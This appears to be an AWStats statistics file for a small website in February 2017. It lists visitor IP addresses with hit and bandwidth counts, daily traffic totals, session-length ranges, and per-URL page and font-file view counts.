23.247.27.3 1 1 72188 20170227105842
37.244.255.33 1 1 72188 20170224143427
62.212.73.49 1 1 72188 20170209084747
190.184.165.217 4 48 5813757 20170220153710
47.9.2.48 1 1 8605 20170212120347
182.70.94.148 8 75 7766094 20170223031341
23.92.25.155 1 1 13837 20170212095324
103.199.241.15 0 71 1548471 
79.112.248.83 1 1 72188 20170209073310
174.127.133.26 0 2 98073 
111.223.121.226 0 1 278588 
74.59.103.59 1 1 72188 20170202124000
59.90.249.123 9 74 7444177 20170221014118
78.190.140.181 0 1 210887 
116.72.38.137 7 116 12334369 20170216062513
41.142.105.238 1 1 72188 20170206081016
106.201.156.129 5 56 5480364 20170210020706
185.173.40.2 0 1 1296073 
138.197.111.52 1 13 508462 20170202142854
174.127.133.62 1 4 127977 20170207165831
79.119.48.95 1 1 72188 20170202053249
157.50.1.29 0 7 703690 
23.247.88.114 1 1 72188 20170207135300
183.82.170.105 1 1 9643 20170204233149
188.213.25.55 1 1 13336 20170219222538
64.233.173.142 4 55 5473346 20170208134719
36.70.219.107 1 1 72188 20170205235826
210.186.52.143 1 1 72188 20170215023335
64.233.172.144 1 36 3578400 20170208134818
138.197.111.59 1 13 508462 20170208212039
89.144.12.15 1 1 72188 20170210061111
183.89.213.238 0 1 8802 
8.37.237.20 7 99 10234261 20170216110419
66.249.84.197 0 1 106614 
92.53.55.179 1 1 72188 20170211144252
69.63.188.210 0 1 57438 
174.127.133.35 1 7 409338 20170207164738
195.154.119.47 1 1 72188 20170217173218
54.179.144.241 1 1 72804 20170207214438
68.99.235.197 1 1 9180 20170207170324
101.53.101.172 1 1 7722 20170213105452
112.215.200.18 0 1 556010 
174.127.133.66 1 1 3319 20170207171907
23.247.72.18 1 1 72188 20170225013136
189.212.9.218 0 1 278588 
66.102.7.251 0 5 353123 
150.107.192.234 6 70 6078095 20170221111952
85.31.138.200 0 1 210887 
105.156.63.150 1 1 72188 20170209125444
52.25.122.161 1 1 72188 20170210110950
138.197.111.239 6 6 391291 20170210041634
94.242.221.70 3 3 186535 20170211060535
64.233.173.134 1 1 9643 20170209022300
49.205.148.147 5 56 5480364 20170220043227
202.168.159.18 3 36 2768568 20170201083722
97.77.215.225 1 1 7722 20170207211124
188.118.181.120 1 1 72188 20170211190057
94.113.124.219 1 1 72188 20170223030625
61.91.54.42 1 1 7722 20170206191124
198.27.85.233 1 1 72188 20170217064821
104.238.180.234 1 1 72188 20170208144427
185.31.161.102 1 1 7722 20170207233308
92.24.28.245 0 1 585861 
103.4.191.235 1 1 72188 20170206124426
90.182.52.72 1 1 72188 20170202072210
171.60.232.223 13 175 18097021 20170213034857
70.15.54.254 1 1 12935 20170213113258
183.129.160.229 1 1 72188 20170206180007
174.127.133.51 1 4 272684 20170207163040
157.50.96.176 2 37 5033863 20170207013257
131.253.27.124 0 1 48008 
221.150.159.206 1 1 72188 20170211142141
174.127.133.58 4 10 635642 20170207175125
46.165.228.78 10 10 551111 20170215010553
174.127.188.37 1 1 72188 20170207150333
139.162.108.53 3 3 216564 20170221145622
92.63.91.81 2 2 144376 20170224130527
217.12.204.250 1 1 7 20170227151522
49.147.146.153 1 1 72188 20170213203354
124.42.7.103 4 4 224286 20170214001954
103.232.129.94 1 1 72188 20170211120317
217.76.202.133 0 1 278588 
47.89.41.164 2 2 79910 20170205095600
42.111.201.181 0 2 149829 
159.203.123.116 1 13 508462 20170204195305
66.87.121.144 1 1 12211 20170204143713
165.117.232.82 2 2 17748 20170218203503
131.253.25.245 0 2 58229 
94.23.173.249 2 2 15444 20170207092920
64.233.172.142 3 30 2887100 20170208134827
200.54.108.54 4 4 224286 20170213142627
184.155.127.34 1 1 72187 20170228152429
205.234.15.196 8 8 400083 20170210211655
176.195.122.168 7 38 1444899 20170212092815
154.123.46.199 1 1 72188 20170207055804
174.127.133.28 3 10 555195 20170207170454
73.205.229.200 1 1 11980 20170222134856
175.143.88.203 1 1 72188 20170214020814
89.248.172.16 2 2 144376 20170218123144
69.58.178.57 7 7 463472 20170202084530
103.212.144.248 7 42 2210207 20170224063851
66.240.236.119 1 1 72188 20170216081344
27.62.163.255 5 56 5480364 20170217011104
203.192.239.216 0 1 65172 
211.123.206.72 1 1 72188 20170216041508
208.90.57.196 2 2 107698 20170202000240
185.110.132.231 5 5 360935 20170228105200
47.11.108.35 0 1 57438 
139.162.114.70 4 4 288752 20170228125724
87.117.189.21 1 1 72188 20170202063302
37.28.183.113 1 1 46 20170211060605
38.100.21.67 4 11 503567 20170211031127
157.50.5.166 0 8 529743 
113.240.250.156 1 1 72188 20170218173302
174.127.133.34 0 1 95992 
66.220.152.177 0 1 57438 
111.119.59.125 1 1 72188 20170210195409
157.50.1.135 6 56 7931378 20170219123253
197.239.7.17 1 1 15366 20170211141542
174.127.133.54 1 1 3319 20170207182053
89.249.253.10 10 10 551111 20170207233450
109.167.205.35 6 6 0 20170217113053
157.50.6.62 0 1 56988 
64.233.173.144 1 50 5432807 20170208134546
5.135.158.101 2 2 79910 20170207023536
174.127.133.61 0 4 51915 
131.253.25.155 0 4 288215 
219.127.253.43 1 1 7722 20170210184434
49.35.5.63 6 70 6078095 20170210031438
141.212.122.129 1 1 72187 20170214024017
78.39.205.75 1 1 72188 20170201154251
192.129.225.108 1 1 7722 20170204062401
139.167.2.62 0 1 110840 
31.210.102.114 1 1 72187 20170201064557
83.217.27.244 1 1 72188 20170218121857
202.46.58.12 1 1 72188 20170211032218
182.68.244.174 6 78 9440066 20170206020519
115.187.56.138 1 1 72188 20170211140654
95.211.138.129 1 1 72188 20170224225017
122.165.134.240 7 90 10016815 20170220065843
200.109.108.137 2 2 79910 20170213175415
107.0.69.23 0 1 86488 
157.50.2.48 5 57 6083785 20170215230732
66.102.7.250 0 1 50208 
85.76.116.165 15 137 13916180 20170212132358
60.191.38.77 3 3 216564 20170221023800
112.203.20.136 1 1 72188 20170214124518
87.49.244.23 1 1 72188 20170219173623
92.85.179.124 1 1 72188 20170211095136
66.102.7.133 0 2 94306 
122.183.191.90 6 65 5913357 20170221062037
213.214.66.46 1 1 72188 20170214214700
178.137.83.79 2 2 144376 20170216094509
139.139.19.68 0 1 50770 
66.102.7.129 0 3 379877 
175.140.198.207 1 1 72188 20170212115017
109.228.91.179 1 1 72188 20170210144744
64.233.172.143 0 33 3146292 
61.3.243.27 7 89 10016139 20170208073825
183.83.163.4 0 1 57438 
31.57.222.202 1 1 72188 20170216215045
174.127.133.55 1 7 220475 20170207174739
109.86.64.57 1 1 7 20170213123719
115.118.229.250 1 1 72188 20170210140424
95.90.245.75 1 1 72188 20170211150047
131.253.27.72 0 8 610837 
175.157.64.8 1 10 338320 20170223125938
27.62.32.160 0 2 149829 
131.253.27.8 1 6 584932 20170227044108
212.90.39.68 1 1 11408 20170212073124
66.102.7.249 0 2 290303 
91.223.133.17 2 2 72188 20170201030847
179.253.157.253 1 1 72188 20170207121251
174.127.133.48 2 7 296908 20170207163646
183.82.33.31 7 71 6114227 20170214031245
174.127.133.40 1 4 127977 20170207164529
173.252.123.134 0 1 57438 
83.228.98.171 1 1 72188 20170211051059
202.213.183.1 1 1 72188 20170211073026
139.162.113.212 1 1 72188 20170206161944
64.233.172.140 2 39 3512167 20170208200436
66.220.158.122 0 1 57438 
174.127.133.38 2 2 75507 20170207173230
94.254.235.49 1 1 72188 20170214171333
66.220.146.28 0 1 57438 
83.110.2.146 0 1 39105 
123.231.111.210 0 1 57438 
54.208.228.13 5 5 360940 20170207175922
49.206.114.43 7 71 6150283 20170212031011
131.253.27.69 0 2 328358 
104.154.94.120 1 1 72188 20170227210306
5.29.213.2 1 1 72188 20170211200657
185.136.150.51 1 1 72188 20170204090142
78.25.121.223 0 1 210887 
49.151.166.11 1 1 72188 20170204104022
41.230.220.177 1 1 72188 20170202124102
138.197.96.169 1 13 508462 20170207201221
58.146.140.221 1 1 72188 20170214071854
95.221.235.222 7 38 1444899 20170224012849
66.249.91.18 1 1 53 20170219152447
1.23.19.203 7 73 6257648 20170201042339
108.207.75.66 3 84 8364154 20170209233118
41.36.93.6 1 1 72188 20170202115037
93.160.62.226 1 1 72188 20170218121432
117.201.9.192 1 1 72188 20170208094433
143.176.49.26 1 1 72188 20170208095915
38.140.157.84 1 1 72188 20170209073952
157.50.151.250 6 56 5051618 20170207013007
155.94.254.143 3 3 216561 20170218111806
27.7.236.159 1 1 72188 20170213013526
91.200.12.143 6 6 518544 20170209090133
192.99.147.201 1 1 12465 20170227215837
188.165.200.217 2 2 20718 20170219190613
203.90.94.12 1 1 72188 20170204151602
37.8.102.70 1 1 72188 20170206031640
188.129.71.192 1 1 72188 20170202131056
122.178.61.151 9 149 18456181 20170228064545
218.191.247.51 1 1 7722 20170214145642
69.63.188.215 0 1 57438 
177.183.32.160 1 1 72188 20170218073309
112.210.66.8 1 1 72188 20170204131314
78.46.43.106 3 3 216564 20170222002245
70.39.157.194 1 1 72188 20170209065650
69.84.207.246 5 5 313073 20170207113058
4.79.123.0 1 1 72188 20170228063607
41.182.108.83 1 1 13837 20170211191046
95.160.26.209 1 1 72188 20170214154905
195.62.53.168 1 1 72188 20170218150458
174.127.133.52 1 6 149388 20170207162430
178.137.192.67 1 1 0 20170213111514
117.247.67.96 2 2 72188 20170208054302
79.75.238.120 1 1 13336 20170220054154
104.128.144.131 1 1 68967 20170218124137
217.195.174.133 0 1 48502 
93.170.130.95 2 2 144376 20170217045104
90.31.164.175 1 1 72188 20170207051756
103.1.236.112 4 4 224286 20170210134026
138.197.111.69 6 6 391291 20170207002942
222.169.193.162 4 4 224286 20170211202414
118.92.141.141 1 1 72188 20170214051952
151.237.238.125 1 1 72188 20170213113723
54.215.137.110 1 1 72188 20170213204842
173.252.90.231 0 1 57438 
54.169.134.235 1 1 72188 20170212040857
182.65.219.241 9 132 14686317 20170220014217
95.76.211.101 1 1 72188 20170211032758
46.235.158.196 6 6 327708 20170204023903
202.91.65.178 6 70 6078095 20170227103430
157.50.5.124 3 27 2345739 20170219123203
166.62.88.41 1 1 72188 20170209223100
91.200.12.141 11 11 964900 20170209112453
169.56.71.56 1 1 72188 20170222185325
86.184.134.40 1 1 72188 20170212142209
174.127.133.50 1 1 3319 20170207171038
201.55.85.142 1 1 72188 20170216081837
185.2.196.196 1 1 60377 20170204023937
196.32.199.82 1 1 72188 20170205075145
91.200.12.106 6 6 518544 20170209090707
64.233.172.141 1 33 2872851 20170208134506
122.171.198.78 1 1 72188 20170213003132
138.197.71.143 6 6 391290 20170208150151
122.165.128.8 8 71 5793612 20170217013053
125.31.19.25 9 9 419616 20170216013814
66.249.83.154 1 1 12119 20170209103815
157.50.0.17 3 48 4896970 20170219020926
190.137.231.26 1 1 72188 20170207140013
187.38.252.219 1 1 12975 20170221212458
94.122.111.200 1 1 72188 20170212143344
185.40.4.169 1 1 72187 20170206130509
182.74.170.18 0 1 1296073 
178.148.128.249 0 1 556010 
173.252.88.181 0 1 57438 
169.54.233.125 1 1 72188 20170215184615
103.196.11.82 1 1 72188 20170217083010
45.63.115.240 2 2 144374 20170227203017
157.50.1.30 0 1 92841 
183.89.213.186 7 58 5624740 20170209004417
145.102.243.162 0 1 115179 
138.197.111.115 1 13 508462 20170206202854
42.119.149.139 0 1 210887 
94.6.215.41 9 76 7816154 20170204054836
210.186.52.142 1 1 11934 20170212101705
45.32.130.87 1 1 72188 20170216211825
125.161.177.240 0 1 57438 
171.60.207.191 1 1 68967 20170207132937
217.197.150.20 1 1 72188 20170220082801
1.46.101.228 1 1 72188 20170202114414
54.183.41.85 12 12 391291 20170223164940
82.139.161.2 1 1 72188 20170213035959
2.238.51.84 0 1 278588 
142.0.128.217 2 2 79910 20170210134116
131.253.27.20 0 2 354039 
109.106.136.20 1 1 0 20170208091139
103.24.212.50 2 2 79910 20170205210227
49.151.158.43 1 1 9467 20170204095915
95.87.194.100 1 1 72188 20170209115744
58.176.46.248 2 2 79910 20170212130155
213.17.29.193 1 1 72188 20170208082236
107.167.112.218 7 71 6114227 20170228081444
116.75.80.4 1 1 72188 20170213084745
47.89.51.239 4 4 99040 20170214120107
200.5.117.18 6 6 61140 20170216013950
59.53.134.232 1 1 72188 20170219230349
183.82.101.24 0 1 278588 
168.235.201.101 8 130 13237582 20170227201835
117.217.237.209 7 83 9530332 20170211071739
66.102.7.131 0 7 842455 
31.176.147.152 1 1 72188 20170201133411
138.197.111.183 6 6 391290 20170201170600
185.69.104.5 1 1 72188 20170211104431
110.44.121.12 1 1 9450 20170210083531
112.2.52.100 14 14 644 20170210185304
175.100.149.195 1 1 72188 20170228054532
180.215.123.47 13 59 3841474 20170208221846
174.127.133.27 1 1 3319 20170207173553
77.77.220.142 1 1 72188 20170218105055
169.149.18.37 6 70 6078095 20170207043159
93.44.200.215 0 1 278588 
86.57.155.118 0 1 210887 
182.64.201.53 6 70 6078095 20170209000603
27.62.37.219 2 4 314161 20170206032220
216.119.136.194 2 2 22189 20170222104818
203.197.136.72 2 2 144376 20170223045135
174.127.133.45 2 8 283856 20170207165056
131.253.27.50 2 6 875179 20170227044114
122.178.49.16 7 88 8214126 20170210030008
158.85.184.108 1 1 72188 20170209194056
163.47.15.110 6 60 4703482 20170221070242
174.127.133.42 0 4 50352 
66.220.152.129 0 1 57438 
169.56.71.57 2 2 144376 20170212223142
188.127.141.119 1 1 72188 20170214115819
65.55.213.31 0 5 502288 
5.172.237.107 1 1 72188 20170213135725
115.187.46.199 1 1 72188 20170209125824
193.124.176.250 1 1 13341 20170212095638
196.52.43.57 1 1 72188 20170207200215
171.49.219.167 6 78 9440066 20170228042759
197.200.5.44 1 1 72188 20170208014149
88.67.97.114 1 1 72188 20170206132153
168.167.35.76 1 1 72188 20170213221754
52.174.52.33 1 1 72187 20170208073620
77.243.183.84 1 1 9614 20170222005603
103.48.181.121 7 56 5012914 20170202042524
91.200.12.7 6 6 518544 20170209090722
112.198.102.147 1 1 72188 20170225015338
89.41.25.208 0 1 278588 
93.34.32.191 0 1 278588 
212.252.164.189 1 1 72188 20170214122420
212.91.189.170 14 14 775397 20170205162115
198.208.209.37 7 90 10016360 20170204023939
85.94.126.184 1 1 72188 20170213024019
162.243.202.25 2 2 151028 20170210211740
88.6.200.103 1 1 72188 20170205022018
85.143.219.211 1 1 72188 20170216140533
103.196.182.125 4 4 38473 20170214120148
88.147.43.88 1 1 72188 20170212025731
174.127.133.49 1 2 168180 20170207161736
174.127.133.21 1 1 72188 20170207153934
91.227.50.108 1 1 0 20170206203705
109.107.139.229 1 1 72188 20170201005305
174.127.133.36 2 14 363860 20170207165114
157.50.4.26 2 10 733223 20170219020924
138.197.111.19 1 13 508462 20170210001209
66.240.192.138 1 1 72188 20170202233018
171.49.175.77 1 19 2064106 20170202052007
185.69.153.94 3 3 152098 20170207023534
208.75.95.148 1 1 7722 20170209020104
131.253.25.234 1 2 98812 20170227044109
190.47.160.188 1 1 72188 20170207193505
103.16.196.243 0 3 146751 
62.72.166.17 1 1 46 20170211060546
171.61.229.115 7 71 6114227 20170224080248
95.10.17.165 1 1 10514 20170211044215
68.32.42.171 1 1 72188 20170212024331
202.46.58.89 1 1 72188 20170211220537
23.247.88.82 1 1 72188 20170207124107
106.208.159.54 0 2 149829 
222.33.192.238 6 6 239730 20170214031735
41.34.144.56 1 1 72188 20170211152954
103.200.77.3 7 89 10016139 20170218003021
5.165.245.17 7 38 1444899 20170224152445
173.252.74.122 0 1 57438 
174.127.133.44 1 2 74731 20170207163313
130.25.132.150 1 1 72188 20170210173723
131.253.27.139 0 5 693201 
196.52.43.66 2 2 144376 20170228185739
217.73.19.86 0 1 210887 
106.208.133.48 6 57 5552552 20170220090104
212.123.29.139 1 1 72188 20170215025312
131.253.27.18 0 1 36868 
62.235.79.145 1 1 72188 20170209111119
157.48.4.68 0 1 210887 
174.127.133.67 3 5 502900 20170207173028
109.87.36.111 1 1 72188 20170207170025
83.85.178.217 1 1 72188 20170209223632
188.230.90.246 1 1 72188 20170213162808
173.252.90.123 0 1 57438 
54.69.119.218 1 1 47362 20170206094932
168.1.128.34 1 1 72188 20170202204346
174.127.133.30 1 1 72188 20170207164603
66.169.139.43 1 1 72188 20170212233232
211.123.208.23 1 1 72188 20170211031744
201.87.241.98 1 1 7722 20170205022548
80.12.169.6 1 1 72188 20170205100454
197.157.210.247 1 1 72188 20170214033653
184.69.67.122 1 1 72188 20170207140408
191.115.61.124 1 1 72188 20170210171521
51.39.57.69 1 1 72188 20170211164845
103.54.222.203 5 56 5480364 20170214010330
184.67.242.226 0 1 278588 
27.62.79.67 5 56 5480364 20170209012734
210.16.84.98 0 1 985493 
131.253.27.57 1 5 365396 20170227044109
14.192.132.95 1 1 72188 20170212072248
104.238.133.192 1 1 72188 20170225015233
174.127.133.37 2 5 131296 20170207172830
157.50.1.112 0 1 106614 
174.127.133.59 1 1 72188 20170207173046
117.196.147.45 9 73 6186491 20170220070126
157.50.3.32 6 62 5548352 20170225022839
157.50.5.249 5 35 2863954 20170217015150
77.126.100.62 1 1 72188 20170228112900
110.227.245.17 9 72 684393 20170223004214
138.197.111.211 6 6 391290 20170205080412
182.232.28.245 0 2 149829 
117.207.115.61 6 69 6029593 20170220073555
117.196.153.42 7 76 9443351 20170222005500
49.228.96.245 0 1 103768 
181.163.66.15 1 1 72188 20170211171844
138.197.111.55 1 13 508462 20170201104336
117.193.123.75 1 1 72188 20170221085720
122.165.115.191 7 89 10016139 20170207013134
95.211.230.94 1 1 72188 20170221084036
71.56.142.31 0 1 210887 
174.127.133.29 2 6 204930 20170207165907
109.163.234.9 1 1 72188 20170223142403
69.63.188.112 0 1 57438 
41.103.10.127 1 1 72188 20170213022053
174.127.133.60 1 8 179892 20170207174310
198.20.69.98 1 1 72188 20170212093335
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 27
20170201 46 354 33175792 13
20170202 52 360 31347521 20
20170203 0 1 50770 0
20170204 47 328 34519796 18
20170205 38 51 2711571 16
20170206 39 126 13191030 18
20170207 132 578 45609334 62
20170208 98 542 48048357 30
20170209 76 437 43159158 28
20170210 143 559 50530085 31
20170211 55 139 12732153 35
20170212 64 335 30286646 30
20170213 31 84 7172573 23
20170214 61 221 20868926 23
20170215 33 290 29898899 8
20170216 41 300 30075190 17
20170217 43 249 20362208 10
20170218 24 159 16350891 14
20170219 20 148 16256841 10
20170220 65 683 68469012 13
20170221 35 283 25559989 10
20170222 33 245 29307054 10
20170223 50 334 24487273 10
20170224 53 430 43644964 10
20170225 9 74 6401273 4
20170227 31 320 30702245 13
20170228 31 313 35558857 12
END_DAY

# Session range - Number of visits
BEGIN_SESSION 6
5mn-15mn 12
0s-30s 401
2mn-5mn 11
30s-2mn 47
15mn-30mn 10
30mn-1h 7
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 34
/ 417 29580431 342 265
/contente.php 149 929110 82 58
/index.php 95 6713656 9 20
/fonts/Rounded%20Elegance.ttf 85 13804560 2 8
/international.php 75 8387401 13 21
/contact.php 71 2529235 2 43
/fonts/pacifico/Pacifico.woff2 71 1732920 0 16
/fonts/helvetica/Helvetica.woff2 71 858480 2 1
/fonts/glyphicons-halflings-regular.woff2 68 1207876 3 2
/domestic.php 61 3549518 10 17
/fonts/helvetica/Helvetica.woff 11 162404 1 0
// 1 21794 1 0
/fonts/helvetica/Helvetica-Bold.eot 4 115280 0 0
/fonts/pacifico/Pacifico.ttf 1 43632 0 1
/googlef32d9fa0f64cf5c4.html 1 53 1 1
//cgi-bin/test-cgi 1 395 0 1
/index.php/component/users/ 1 72188 1 0
/fonts/helvetica/Helvetica.ttf 1 27168 1 1
/fonts/glyphicons-halflings-regular.woff 9 210816 0 0
/fonts/pacifico/Pacifico.eot 6 262920 0 1
/about_us.php 43 1491418 1 13
/fonts/glyphicons-halflings-regular.ttf 1 45404 1 1
/fonts/helvetica/Helvetica.eot 6 142944 0 0
/fonts/glyphicons-halflings-regular.eot 6 120762 0 0
/fonts/pacifico/Pacifico.woff 10 1056960 0 0
/js/ 6 19914 4 6
/fonts/helvetica/Helvetica-Bold.ttf 1 53100 1 1
/fonts/helvetica/Helvetica-Light.ttf 1 25112 1 1
/fonts/helvetica/Helvetica-Bold.woff2 8 211064 0 0
/fonts/helvetica/Helvetica-Light.woff2 10 100620 0 0
/fonts/helvetica/Helvetica-Bold.woff 3 103464 0 0
/fonts/helvetica/Helvetica-Light.woff 10 139160 0 1
/fonts/helvetica/Helvetica-Light.eot 7 156100 0 0
/mail.php 39 1794 10 9
END_SIDER
